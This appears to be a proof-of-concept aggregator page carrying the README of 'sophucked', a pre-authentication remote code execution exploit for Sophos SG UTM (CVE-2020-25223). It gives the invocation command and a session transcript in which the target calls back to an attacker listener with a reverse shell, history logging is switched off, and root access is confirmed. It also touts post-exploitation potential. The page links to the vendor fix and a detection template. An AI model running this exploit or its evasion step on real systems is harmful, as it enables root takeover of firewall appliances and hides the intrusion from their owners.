CVE-2020-25223 PoC — Sophos SG UTM 操作系统命令注入漏洞

来源

关联漏洞

Description

CVE-2020-25223

介绍

# sophucked
CVE-2020-25223 RCE PoC, gets reverse shell. Pre-auth. Implemented this quickly as it was needed to unify some threat magnets. 


## Example Use:
```
# python sophucked.py https://x.x.x.x:4443 x.x.x.x 80
(+) starting handler on port 80
(+) Sending callback to x.x.x.x:80
(+) connection from x.x.x.x
(+) pop thy shell!
bash: no job control in this shell
utm:/var/confd # unset HISTFILE
unset HISTFILE
utm:/var/confd # id
id
uid=0(root) gid=0(root) groups=0(root)
utm:/var/confd # exit
exit
exit
*** Connection closed by remote host ***
# 
```

## Scanning/Detection
Not implemented in this, just use the [nuclei template](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2020/CVE-2020-25223.yaml).

## Post-exploitation notes
These have a python interpreter, and actually a very fully featured Linux environment available. Amazing potential for post-exploitation. 

## Blue team notes
I'm sure someone who cares can fill this in. Bitter (a subset of "blue team twitter") will probably do so shortly. I mean, it can't be that hard to detect an unencrypted reverse shell beaconing out from your Unified Threat Manager box right?

## Fixing the bug  
Someone (presumably from Sophos) sent this over, its the official fix link. Go update your UTM. https://www.sophos.com/en-us/security-advisories/sophos-sa-20200918-sg-webadmin-rce

## References, etc.

Third party reference (bug details): https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223

Direct complaints to Sophos, who somehow thought passing user input to `open()` in Perl was a good idea in the 21st century. 

文件快照

 [4.0K]  /data/pocs/edafa1580bfbbf6d082f53ffc09eae241e7f28ce
├── [1.6K]  README.md
└── [2.2K]  sophucked.py

0 directories, 2 files

备注